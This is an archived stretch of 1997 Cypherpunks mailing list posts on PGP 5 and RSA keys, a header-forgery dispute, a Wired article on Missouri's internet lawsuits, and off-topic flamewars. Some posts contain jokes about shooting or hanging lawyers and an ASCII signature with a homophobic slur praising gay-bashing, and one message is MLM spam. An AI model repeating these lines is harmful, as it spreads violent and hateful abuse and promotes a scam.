announce-off at lists.zdnet.com
You can leave the subject and body blank.
_______________________________________________________________

Powered by Mercury Mail: http://www.merc.com

===============================================================






From whgiii at amaranth.com  Mon Aug 11 21:08:24 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Tue, 12 Aug 1997 12:08:24 +0800
Subject: The Right to Bare Arms on "The slippery slope" of Capital Hill
In-Reply-To: <199708120055.CAA02213@basement.replay.com>
Message-ID: <199708120326.WAA10450@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708120055.CAA02213 at basement.replay.com>, on 08/12/97 
   at 02:55 AM, nobody at REPLAY.COM (Anonymous) said:

>p.s. - Or, how about, "If elected, we promise to kill ourselves."?

A much better solution would be to shoot the bastards when they send in
their applications to Law School. Anyone who wants to be a lawer deserves
a rope and a tree to hang from.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM+/J2I9Co1n+aLhhAQHKPQP+JKTdQzodpYdGra3yTLUqkdQ2UNiiy1pR
m9m4bhxJrWAuxVzii2ZOzj0NoFIOnIxKLTUrtVBHigokzPjo/QYh4UC8rBqtfX0L
BUp3amW+enM3VcCfd8So52UhoXncmZ3u0FhvpFA9iLHjz9yZ2KF+2Aeq3lbiYxiJ
0QHPaOdLn/E=
=zNj8
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Mon Aug 11 22:07:26 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Tue, 12 Aug 1997 13:07:26 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <199708120307.WAA13721@dfw-ix15.ix.netcom.com>
Message-ID: 




As PGP5i will be outside RSA's patent reach (i.e. the patent is only valid
within the US) will PGP5i support RSA keys?

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From tcmay at got.net  Mon Aug 11 23:08:42 1997
From: tcmay at got.net (Tim May)
Date: Tue, 12 Aug 1997 14:08:42 +0800
Subject: Guy Polis--FORGERY
In-Reply-To: 
Message-ID: 



At 6:27 PM -0700 8/11/97, Peter Trei wrote:
>Dr.Dimitri Vulis KOTM wrote:
>> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
>> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
>> like a bad troll intended to make the folks who promote the use of crypto
>> look like, well, crackpots. Be warned.
>
>Tim May wrote:
>>  Yeah, and like we're gun-nuts, too!

Actually, I didn't write that. Just another forgery from "Toto" (I am
presuming, from past admissions and from the "wombat.sk.sympatico.ca"
origins).

Here are some of the relevant headers. Note also the Organization field.

Received: from wombat.sk.sympatico.ca (wombat.sk.sympatico.ca
[142.165.5.136]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA24941 for
; Mon, 11 Aug 1997 18:31:33 -0700 (PDT)
Received: from default (lohner24.sk.sympatico.ca [142.165.98.24]) by
wombat.sk.sympatico.ca with SMTP (8.7.1/8.7.1) id TAA03750 for
; Mon, 11 Aug 1997 19:27:40 -0600 (CST)
Message-ID: <33EFB850.5B50 at got.net>
Date: Mon, 11 Aug 1997 19:11:44 -0600
From: Tim May 
Organization: Electronic Forgery Foundation

This is getting tiresome. It may be time to just head up to Ottawa, or
wherever, look this guy up, and do something about him. His overly long
drunken rants are one thing, and are easily deleted, but impersonating me
is straight out of Detweiler's book. Must be something about Cypherpunks
that brings out this urge to impersonate.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From whgiii at amaranth.com  Mon Aug 11 23:56:05 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Tue, 12 Aug 1997 14:56:05 +0800
Subject: Guy Polis--FORGERY
In-Reply-To: 
Message-ID: <199708120641.BAA12323@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/11/97 
   at 10:44 PM, Tim May  said:

>At 6:27 PM -0700 8/11/97, Peter Trei wrote:
>>Dr.Dimitri Vulis KOTM wrote:
>>> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
>>> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
>>> like a bad troll intended to make the folks who promote the use of crypto
>>> look like, well, crackpots. Be warned.
>>
>>Tim May wrote:
>>>  Yeah, and like we're gun-nuts, too!

>Actually, I didn't write that. Just another forgery from "Toto" (I am
>presuming, from past admissions and from the "wombat.sk.sympatico.ca"
>origins).

>Here are some of the relevant headers. Note also the Organization field.

>Received: from wombat.sk.sympatico.ca (wombat.sk.sympatico.ca
>[142.165.5.136]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA24941 for
>; Mon, 11 Aug 1997 18:31:33 -0700 (PDT) Received:
>from default (lohner24.sk.sympatico.ca [142.165.98.24]) by
>wombat.sk.sympatico.ca with SMTP (8.7.1/8.7.1) id TAA03750 for
>; Mon, 11 Aug 1997 19:27:40 -0600 (CST) Message-ID:
><33EFB850.5B50 at got.net>
>Date: Mon, 11 Aug 1997 19:11:44 -0600
>From: Tim May 
>Organization: Electronic Forgery Foundation

>This is getting tiresome. It may be time to just head up to Ottawa, or
>wherever, look this guy up, and do something about him. His overly long
>drunken rants are one thing, and are easily deleted, but impersonating me
>is straight out of Detweiler's book. Must be something about Cypherpunks
>that brings out this urge to impersonate.

Nothing personal Tim but one of the reasons for using Digital Signatures
is to prevent such forgeries.

Ofcource you could be forging the forgeries to persent "plausable
deniability" to all your posts. :)



- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM+/3vI9Co1n+aLhhAQGOFgP+MDGPt4TFlYNsR3zJBuW+yFI7leiXcEvU
KuJVPBw9C+RMAXXgD4ryBrBiuSPa0yYnqDsJpxmqDW4zQ72DKt99ISkHT7VRd5bL
iGfBBe8Mnrm8TuBYhu/nmUYhlai400COl09w+cAm+URF5q9xyqcH33d7wINtC9Zt
rJmNStXSTxY=
=D7WA
-----END PGP SIGNATURE-----






From travel23 at juno.com  Mon Aug 11 23:57:39 1997
From: travel23 at juno.com (The Traveler)
Date: Tue, 12 Aug 1997 14:57:39 +0800
Subject: Forged headers
Message-ID: <19970812.020823.3662.1.travel23@juno.com>



Does anyone know of a URL where you can get information on how to forge
headers and email addresses?

The Traveler

-----------------------------
"Sometimes you're the bug, sometimes you're the windshield."






From dformosa at st.nepean.uws.edu.au  Tue Aug 12 03:27:33 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Tue, 12 Aug 1997 18:27:33 +0800
Subject: Forged headers
In-Reply-To: <19970812.020823.3662.1.travel23@juno.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Aug 1997, The Traveler wrote:

> Does anyone know of a URL where you can get information on how to forge
> headers and email addresses?

ftp://ds.internic.net/rfc/

The files called rfc*.txt contain most of the infomation that you need to
know to be able to forge email and headers.  My advice for you is to start
with the low numbered ones and work your way up to the higher numbered
ones.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+/udqQK0ynCmdStAQHgOQP/dBTOEiyxGIug8zIfIF9nST8Tp3bHQl2a
AZwHvYmh1TJyelPZG8sgtT6FJ1SVUSNNBSo6M3DQ5dxuA8DrJjg8wRdu8QJIYt/l
vsYtRZwMAvYEW0YcfM8z+KC1GH7viSZzAfksQoVojXQhe77LytkKNpMzs44oGtNZ
WZAnpH60vho=
=RIQg
-----END PGP SIGNATURE-----






From jrennie at hardy.ocs.mq.edu.au  Tue Aug 12 03:27:41 1997
From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE)
Date: Tue, 12 Aug 1997 18:27:41 +0800
Subject: Masons and Fnords
In-Reply-To: 
Message-ID: 




> 
> > (Why do you think the new standard for secure commerce is called SET?)
> 
> Bah, why do you think most UNIX shells have the command SET in them?  All
> variables are under Set's influence!  setenv's just Set's son. :)
 
What really !!!! NOOOOOOOOOOOOOOOOOOOOOO. run for the hills =. But wait 
the NWO fascists will protect us from the masons






From rab at stallion.oz.au  Tue Aug 12 03:27:48 1997
From: rab at stallion.oz.au (rab at stallion.oz.au)
Date: Tue, 12 Aug 1997 18:27:48 +0800
Subject: Forged headers
Message-ID: 



Try RFC822...

> ----------
> From: 	The Traveler[SMTP:travel23 at juno.com]
> Sent: 	Tuesday, 12 August 1997 16:08
> To: 	cypherpunks at toad.com
> Subject: 	Forged headers
> 
> 
> Does anyone know of a URL where you can get information on how to
> forge
> headers and email addresses?
> 
> The Traveler
> 
> -----------------------------
> "Sometimes you're the bug, sometimes you're the windshield."
> 






From jrennie at hardy.ocs.mq.edu.au  Tue Aug 12 03:27:58 1997
From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE)
Date: Tue, 12 Aug 1997 18:27:58 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: <199708110147.DAA25245@basement.replay.com>
Message-ID: 




> Too many Christians try to censor atheist site because it defies their Almighty God (TM), and somehow clouds others views.

I notice to many and all for you have a way of being the same. Typical 
narrow minded sterotyping. 

> 
> Bullshit.  Most Christians I see IRL and on TV cringe at books other than The Good Book(TM).  Creationism is bullshit, God didn't make everything in 7 days, we evolved from monkeys and various others (Although many half-evolved monkeys can be seen on TV Evangelism shows and in Congress).

SO get out more and meet more Christians. Dont generalise to some tiny 
subset you know.  
> In order to believe in something, I need some hard facts.  I need to actually see a god (while I'm sober) talk to me and I talk back and see him actually makes things.  Unlike some of the weaker people, I can't just believe it because "anything's possible".  I can't believe it because a minister or a book tells me.  When I was around 8 years, I read this section of the bible asking questions like (it was in the back) "How do we know the bible is true?"  I was intersted, reading further, I noticed some page numbers, so I went there, finding not words of a scientist, but supposed words of god.  If god supposedly asked people to write this, and he says it's true, then that's called bullshit, because that's like someone writing a crypto algorithm, and stating it's secure even though no one else has seen it.
                                                ^^^^^^^^^^

Next you'll claim to belive in evoloution because it has hard facts. 
Sorry to burst your bubble but evolotuion is at least as faulty as 
creationsim. And before you shoot your mouth off and look stupid, i have 
studied a lot of biological scinces at a teritiry level, and was majoring 
in it till i swithced to computer science. I also know heaps of biology 
students who share a similar opinionof evolotuion. No not all of these 
are Christians they just know what there talking about.


> In short, unless I see it for myself, I won't believe it fully.  In religions case, at all.

Again, your probably an evolotuoinist. You belive in quarks don't you ?? 
But wait you cant see them and all information realted to them is 
theoretical. Still what can i expect from the sheltered ignorant. 

Get out more and meet more poeple and dont generalise to all from small 
subsets you ignorant individual.

Jason 






From patrick at atro.pine.nl  Tue Aug 12 04:24:30 1997
From: patrick at atro.pine.nl (Patrick Oonk)
Date: Tue, 12 Aug 1997 19:24:30 +0800
Subject: The BIG Lie (Jesus Confesses)
In-Reply-To: 
Message-ID: <199708121110.NAA25127@atro.pine.nl>



> 
> 
> 
> > Too many Christians try to censor atheist site because it defies their Almighty God (TM), and somehow clouds others views.
> 
> I notice to many and all for you have a way of being the same. Typical 
> narrow minded sterotyping. 
> 
> > 
> > Bullshit.  Most Christians I see IRL and on TV cringe at books other than The Good Book(TM).  Creationism is bullshit, God didn't make everything in 7 days, we evolved from monkeys and various others (Although many half-evolved monkeys can be seen on TV Evangelism shows and in Congress).

Is this what the cypherpunks list has become ? Discussions about religion ?

If so, I am out of here...

-- 
| Patrick Oonk -    http://patrick.mypage.org/  - patrick at pine.nl |
| PGP Key ID 0xDA2E93FA   -   Internic PO59   -    |
| Pine Internet B.V.           Consultancy, installatie en beheer |
| Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ |






From Michael.Johnson at mejl.com  Tue Aug 12 04:27:35 1997
From: Michael.Johnson at mejl.com (Mike)
Date: Tue, 12 Aug 1997 19:27:35 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <199708120307.WAA13721@dfw-ix15.ix.netcom.com>
Message-ID: <3.0.3.32.19970812115945.009789d0@localhost>



? the platypus {aka David Formosa} wrote:
>As PGP5i will be outside RSA's patent reach (i.e. the patent is only valid
>within the US) will PGP5i support RSA keys?

Yes.

All versions of PGP5 supports RSA for encryption/decryption.

PGP50freeware from MIT can not generate RSA keys, but the scanned version
PGP50i
 can generate both RSA and DSS/DH keys.

If you have PGP50freeware, you can still import RSA keys (from 50i or 2.6)
and use them, you just can't generate the keys.


Mike.






From frogfarm at yakko.cs.wmich.edu  Tue Aug 12 04:27:43 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 12 Aug 1997 19:27:43 +0800
Subject: 5881.html
Message-ID: <199708120842.EAA09809@yakko.cs.wmich.edu>




   [1][Masthead]
   []
   [2][Navigation bar]
   [3][Stocks] __________
   ______________
   [4][Search] [5][WIRED magazine]
   Matt Richtel -->
   []
   [6][Back] He Tries to Draw Legal Borders in Cyberspace
   by [7]Matt Richtel 
   5:04am  11.Aug.97.PDT In one of the first undercover stings ever run
   on the Internet, Missouri Attorney General Jeremiah "Jay" Nixon in
   late June handed an 18-year-old intern a credit card and sat her down
   in front of a computer terminal. According to court records, the
   intern visited the World Wide Web site of [8]Hog's Head Beer Cellars
   of Greensboro, North Carolina. She succeeded in ordering a 12-pack of
   microbrews, which were duly delivered.
   
   Then Nixon swung into action. He filed a lawsuit against Hog's Head,
   alleging that the company had not asked for a driver's license number
   from the intern or taken other steps to prevent a minor from
   purchasing alcohol.
   
   "There was no mention on the Web site that you have to be of age,"
   Nixon said. "It's safe to say that any establishment in the state of
   Missouri [that similarly served drinks to minors] would lose their
   license."
   
   Co-owner Jim Lowe concedes that Hog's Head lacked an age-checking
   mechanism when Nixon sicced the minor on him, and says that
   shortcoming has been remedied by requiring customers to fax a signed
   waiver form and copy of their drivers' license to get an order
   processed.
   
   Protecting sovereignty, defining borders
   
   Nixon's beef is not, however, merely about selling alcohol to minors.
   He speaks of protecting the sovereignty of states and of maintaining
   order in the increasingly borderless world created by the Net. His
   targets say, not surprisingly, that he has another agenda, too: waving
   the flag of supposed cyberspace lawlessness to win votes for his 1998
   US Senate campaign.
   
   "He's using this as a political springboard," said Lowe. "People are
   emailing us saying: Doesn't the AG have anything better to do than
   surf the Internet?"
   
   Over the past three months, Nixon has made an increasingly visible
   effort to crack down on what he alleges are illegal businesses run by
   Web-based firms. He has twice sued online gambling businesses, in one
   case winning a fine.
   
   Nixon said that he has taken a tough stand on the issues, particularly
   in the case of Internet gaming, because the federal government has
   dropped the ball on regulation.
   
   "We're going to have to, as 50 different states, get very, very active
   that the protections afforded our constituents continue," Nixon said,
   adding that in the case of gaming, "The federal government has
   basically been AWOL."
   
   Interference with commerce?
   
   Legal entanglements aside, Lowe said he has a bigger problem with
   Nixon's approach.
   
   Instead of trying to clarify how the law might operate in cyberspace,
   Nixon is actually interfering with Internet-based commerce. And Lowe
   numbers himself among the growing number of merchants that feel they
   need the Internet to compete.
   
   Meanwhile, Nixon finds himself fighting perhaps more visible cases
   with two gaming businesses on the Internet. In April, he filed a
   lawsuit against Interactive Gaming & Communications Corp., accusing
   the Pennsylvania company of setting up a casino that violates Missouri
   gaming laws and fails to caution citizens of the Show Me state that
   what the site promotes is against the law.
   
   Nixon won an initial victory in May, when a court ordered Interactive
   Gaming to pay $66,050 in penalties and costs. Nixon said the firm
   refused to pay or to back down. So in June, he asked the grand jury in
   Springfield to indict Interactive Gaming president Michael Simone. In
   what is believed to be the first criminal indictment of its kind in
   the nation, the grand jury handed down a charge of promoting gambling
   in the first degree, a Missouri Class D felony that could carry a
   five-year prison sentence and $5,000 fine for Simone and a $10,000
   fine for his company.
   
   Interactive Gaming's attorney, Lawrence Elliott Hirsch of
   Philadelphia, said in a statement that Missouri has no jurisdiction
   over them. "Michael Simone has never set foot within the state of
   Pennsylvania," said Hirsch. "Mr. Nixon should not be permitted to be a
   super-regulator/legislator of activities conducted lawfully on the
   Internet."
   
   Nixon's response was cool. "Missouri law makes only narrow exception
   for legal gambling, and the Internet is not one of those exceptions,"
   he said.
   
   Battling a tribal lottery
   
   Nixon is also embroiled in a dispute with Idaho's Coeur d'Alene
   Indians. Early this summer, he filed suit to prevent the tribe from
   offering its Web-based US Lottery game in Missouri. As in the
   Interactive Gaming case, Nixon alleges that the Coeur d'Alene are
   violating Missouri law - this time because they have not received
   permission to operate a lottery.
   
   Uncertainty about who really has jurisdiction over Indian gambling
   complicates the case. The 1988 federal Indian Gaming Regulatory Act
   permits tribes to establish casinos on their land, with the permission
   of their home-state governments. The Coeur d'Alene argue that since
   they have permission from Idaho, and since the Net lottery is run
   exclusively on their land, they should be able to offer it anywhere
   they please.
   
   "All the gaming is happening on Indian land - the server is there, the
   random drawing is there, the game itself is played there, the customer
   service is there, the cash account is there," said Mike Yacenda,
   president of Unistar Entertainment, a Connecticut company that manages
   the Coeur d'Alene lottery. "This is the only legal lottery site on the
   Internet."
   
   David Matheson, chief executive officer for gaming for the Coeur
   d'Alene, accuses Missouri of trying to keep the tribe down. "You can
   stand in their lines and buy their lottery tickets," he said. "They're
   trying to make us a poster child for their political games."
   
   The legal nature of the Net
   
   Nixon's stance on the Coeur d'Alene puts him at odds with the many who
   argue that efforts to legislate Net activity - whether the subject is
   gambling, pornography, spam, or taxation - is doomed to failure
   because of the network's diffuse global nature.
   
   But the attorney general doesn't buy any of that. He said there's a
   big difference between Missouri's legal gaming, such as on riverboats,
   and the intrusions from the outside. He argues that Internet-based
   casinos are merely trying to excuse unregulated activity on the
   specious basis that technology makes everything different. Or that
   when an activity is legal in one area - for example, a reservation -
   it should be universally legal because of the Internet.
   
   Nixon said if that's the case, other states or countries will use the
   Net to import activities or substances that are illegal in Missouri
   but legal in their place of origin. That gets to what Nixon said is
   his larger point: Some Internet businesses are threatening Missouri's
   sovereignty and someone needs to "draw a line."
   
   "If we don't draw these lines," he said, "then there are no lines."
   Find related stories from the Web's top news sites with [9]NewBot
   [10][Back] [11][Navigation strip]
   [12]Rants & Raves: Send your rants and raves to Wired News.
   
   [13]Tips: Have a story or tip for Wired News? Send it.
   [14]Copyright � 1993-97 Wired Ventures Inc. and affiliated companies.
   All rights reserved.
   [15][HotWired and HotBot]
   [] []
   [16]Oracle
   [Politics]
   POLITICS
   Today's Headlines
   [17]Info Watchdogs Challenge FBI Wiretap Plan
   [18]Amid Cycling Uproar, Evidence Goes Online
   [19]He Tries to Draw Legal Borders in Cyberspace
   [20]ACLU: Labeling May Lead to Lost Liberty
   [21]Scans: Spinning the FCC
   [22]Invitation to a Beheading
   [23]Oracle

References

   1. LYNXIMGMAP:http://www.wired.com/news/news/politics/story/5881.html#masthead.map
   2. LYNXIMGMAP:http://www.wired.com/news/news/politics/story/5881.html#nav1.map
   3. http://www.hotwired.com/cgi-bin/redirect/10010/http://stocks.wired.com/
   4. LYNXIMGMAP:http://www.wired.com/news/news/politics/story/5881.html#nav2.map
   5. http://www.hotwired.com/cgi-bin/redirect/10012/http://www.wired.com/wired/
   6. http://www.wired.com/news/news/top_stories/
   7. mailto:matrichtel at aol.com
   8. http://www.hogshead.com/index.htm
   9. http://www.hotwired.com/cgi-bin/redirect/10018/http://www.wired.com/newbot/
  10. http://www.wired.com/news/news/top_stories/
  11. LYNXIMGMAP:http://www.wired.com/news/news/politics/story/5881.html#navstrip.map
  12. http://www.wired.com/news/rantrave.html
  13. mailto:tips at wired.com
  14. http://www.wired.com/wired/full.copyright.html
  15. LYNXIMGMAP:http://www.wired.com/news/news/politics/story/5881.html#nav3.map
  16. http://www.wired.com/event.ng?Type=click&ProfileID=26&RunID=28&AdID=464&Redirect=http:%2F%2Fwww.oracle.com%2Fst
  17. http://www.wired.com/news/news/politics/story/5958.html
  18. http://www.wired.com/news/news/politics/story/5927.html
  19. http://www.wired.com/news/news/politics/story/5881.html
  20. http://www.wired.com/news/news/politics/story/5882.html
  21. http://www.wired.com/news/news/politics/story/5761.html
  22. http://www.wired.com/news/news/politics/story/5753.html
  23. http://www.wired.com/event.ng?Type=click&ProfileID=26&RunID=28&AdID=464&Redirect=http:%2F%2Fwww.oracle.com%2Fst






From dlv at bwalk.dm.com  Tue Aug 12 05:25:37 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 12 Aug 1997 20:25:37 +0800
Subject: Guy Polis
In-Reply-To: 
Message-ID: <4FoBBe4w165w@bwalk.dm.com>



Tim May  writes:

> At 6:27 PM -0700 8/11/97, Peter Trei wrote:
> >Dr.Dimitri Vulis KOTM wrote:
> >> There's a crackpot by the name of Guy Polis (guy at panix.com, polis_guy@
> >> jpmorgan.com) who posts a crackpot "cryptographic manifesto" and sounds
> >> like a bad troll intended to make the folks who promote the use of crypto
> >> look like, well, crackpots. Be warned.
> >
> >Tim May wrote:
> >>  Yeah, and like we're gun-nuts, too!
>
> Actually, I didn't write that. Just another forgery from "Toto" (I am
> presuming, from past admissions and from the "wombat.sk.sympatico.ca"
> origins).
>
> Here are some of the relevant headers. Note also the Organization field.
>
> Received: from wombat.sk.sympatico.ca (wombat.sk.sympatico.ca
> [142.165.5.136]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA24941 for
> ; Mon, 11 Aug 1997 18:31:33 -0700 (PDT)
> Received: from default (lohner24.sk.sympatico.ca [142.165.98.24]) by
> wombat.sk.sympatico.ca with SMTP (8.7.1/8.7.1) id TAA03750 for
> ; Mon, 11 Aug 1997 19:27:40 -0600 (CST)
> Message-ID: <33EFB850.5B50 at got.net>
> Date: Mon, 11 Aug 1997 19:11:44 -0600
> From: Tim May 
> Organization: Electronic Forgery Foundation
>
> This is getting tiresome. It may be time to just head up to Ottawa, or
> wherever, look this guy up, and do something about him. His overly long
> drunken rants are one thing, and are easily deleted, but impersonating me
> is straight out of Detweiler's book. Must be something about Cypherpunks
> that brings out this urge to impersonate.

Toto's drunked rants and the most valuable traffic on this mailing list
these days - I read them and usually save them.  Tim May's censorship
rants make him sonnd like kent Krispin.

How do we know that Tim May didn't post the alleged forgery himself
and didn't munge the headers to point to Toto?

Here's a nice new .signature for you, Tim, courtecy of Dr. Fomin:

]      .                ,
]       `.    ____    ,'::.
]         `-d8%XX88b-':... .
]   .  .  :88%,+,iX.8.:.. .      Dr. Vladimir Il'ich Fomin
]  . .   d.%%/:: \iX8..... .
]. . .   :%%{::Q .}iX.8 . .      rec.food.borscht
] . .   d.%%}:/.\ {iX8.b .
] .  .  .%.{;'.;:`:}iX.8.. .     rec.food.drink.vodka
]: .  . o%%/. /l\::\iX8::.. .
] ....  .%{. //l\\::}iX}.:..
]: ..   {%{.{{ *:}}:}iB:::.:.   "Did you beat up a faggot today?"
].:.. . :.%\.\\l//:/i:}::.:.
]:.::. .  j%`.`-';'i.P:::.:.
]::.:.:. .:x.%`+'iX:P:::.:..  Please e-mail all your MLM offers
]::::.:.... 8%%A:8.}:::.:..   and business opportunities to:
]::::.::.:..j:(*).P::::.::..  news-admin-net-abuse-policy at uunet.uu.net
] ::::.:.:...x.V8P::::.:...
] :::::.::.:..`l'::::.:....
]   ::::::::.,' `:::::...
]  `---____-'     `-____---'

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From jya at pipeline.com  Tue Aug 12 05:28:50 1997
From: jya at pipeline.com (John Young)
Date: Tue, 12 Aug 1997 20:28:50 +0800
Subject: HOPE and Wiretap News
Message-ID: <1.5.4.32.19970812113341.006e7190@pop.pipeline.com>



NYT had a front page story yesterday on the HOPE meet. 
Featuring hack of NYC's Metrocard, with wry commentary
on new adventures "underground." A quote:

   Bruce Schneier, a highly regarded cryptography expert who
   spoke at the conference, said experience bad taught him
   that hackers often understood computer systems better than
   the engineers who designed them.

   "Hackers just have a much more holistic view," he said.

   Mr. Schneier, who is a consultant to Cubic on the
   next-generation Metrocard, said he believes someone will
   inevitably figure out a hack. "I believe that, fundamentally, 
   a system as complicated as the Metrocard
   cannot be absolutely secure," he said.

---------

See full report at:

   http://jya.com/beyond-hope2.htm

Aptly, with Bruce's emphasis at HOPE on the need for laws to 
punish computer criminals and to close the global jurisdictional 
gap so there's no refuge for outlaws, there's Markoff's report 
yesterday on a petition to the FCC opposing the FBI's digital 
wiretap plan:

   http://jya.com/tap-opp.htm






From 23933677 at compuserve.com  Tue Aug 12 20:29:56 1997
From: 23933677 at compuserve.com (23933677 at compuserve.com)
Date: Tue, 12 Aug 1997 20:29:56 -0700 (PDT)
Subject: The Easiest One Yet, By Far !
Message-ID: <19978540025.FDD08056@mlcirrumert.com>


*To be removed please reply with "remove" in the subject line.
-------------------------------------------------------------------------------------------------

I DON'T HAVE TIME FOR MLM
AND I DON'T WANT TO TALK TO PEOPLE,

YET I MADE $2300.00 LAST WEEK ( 4TH WEEK ) !

********************************************************
**** CALL (800) 811-2141   CODE #15645  *****
********************************************************

SIMPLY ADVERTISE THE ABOVE (800) 
NUMBER WITH YOUR OWN ID CODE!

IT'S THAT EASY!

We talk to them for you! We mail the materials! 
We close them! You get $100 EACH paid weekly!
      
	PAYS UP TO 85% TO INFINITY     !!!    

"I made & received $2,300 my 4th week,
$2,360 my 3rd week, and $2,110 my 2nd week."

*** IF YOU CAN FIND A PROGRAM THAT'S
EASIER THAN THIS ONE, WE WILL ENROLL 
YOU FOR FREE !!!

YOU HAVE NOTHING TO LOSE.
 
THE CALL IS FREE !!! CALL NOW !!!

********************************************************
**** CALL (800) 811-2141   CODE #15645  *****
********************************************************






From allan at spamport.excite.com  Tue Aug 12 05:51:17 1997
From: allan at spamport.excite.com (Allan Bailey)
Date: Tue, 12 Aug 1997 20:51:17 +0800
Subject: Crypto Patents and PGP Lib 3.0?
Message-ID: <199708121238.HAA02882@fractal.austin.excite.com>




  I haven't seen any mention lately of the mythical PGP Lib 3.0.
The last I recall hearing was that it was waiting to be release this month
when certain patents expired.

  Does anyone know which patents or algorithms those are?  I know that D-H expired
back in April, but what about RSA and any other "basic" algorithms?
 
--
Allan Bailey
Excite, Inc. (Austin)






From isparkes at q9f47.dmst02.telekom.de  Tue Aug 12 06:12:40 1997
From: isparkes at q9f47.dmst02.telekom.de (Ian Sparkes)
Date: Tue, 12 Aug 1997 21:12:40 +0800
Subject: Comments on PGP5.0 OCR
In-Reply-To: <199708111432.PAA00907@server.test.net>
Message-ID: <3.0.2.32.19970812150519.006ac9ec@q9f47.dmst02.telekom.de>



-----BEGIN PGP SIGNED MESSAGE-----

At 17:46 11.08.97 +0200, you wrote:
>At 15:32 11.08.97 +0100, Adam Back wrote:
>>
>>Mark Grant  writes:
>>> 
>>> I just wanted to make a few comments on the proofreading, in case 
anyone
>>> feels like releasing software in a similar manner in future:
>>> 
>>> [...] the OCR-ed pages at HIP included a per-line
>>> checksum. This was good... but... it also checksummed the 
whitespace. 
>>> This wasn't a problem in theory, because tabs were indicated by a 
special
>>> character. However, most lines had both tabs *and* spaces and 
there was no
>>> way to see where the spaces were because they were overrriden by 
the tab
>>> (e.g. "movax,23; Stuff"). 
>>
>>How about a book full of 2D barcodes?  
>>
>>As a plus perhaps the book would be more compact, as you could gzip 
it
>>first -- the full source tree looks to be over a foot of 
doublesided
>>paper!
>>
>
>How about importing the scanned in source (in electronic form) back 
into
>the States and doing a 'diff' there. This could produce an 
electronic
>patchfile to repair the mistakes in the scanned in code, meaning 
that the
>whole of the code could be cleaned up in one go. This patchfile 
could then
>be exported as it holds no crypto source code. (Somehow this seems 
*too*
>simple. Would this perhaps get up the US gubmint's nose? Have I 
missed some
>nuance or implicit limitation?)

How far could this be pushed? In the extreme case we could supply a 
file full of junk (random bytes) and then apply a patch to it to turn 
it into source code.

>
>>Adam
>>-- 
>>Have *you* exported RSA today? --> 
http://www.dcs.ex.ac.uk/~aba/rsa/
>>
>>print pack"C*",split/\D+/,`echo 
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
>>)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0>
>>
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/BtnbgTZRKKFcAJAQFNlwP/ZhB2NZZv0qAuytMf2VLfLGV6mtY9vq/H
J4Z5q3wBzhoLPNaXJ3exdQ1+z+5CdHYFS9hvmeDCEi0wKLNzMZMZPIRVAsgCUgbo
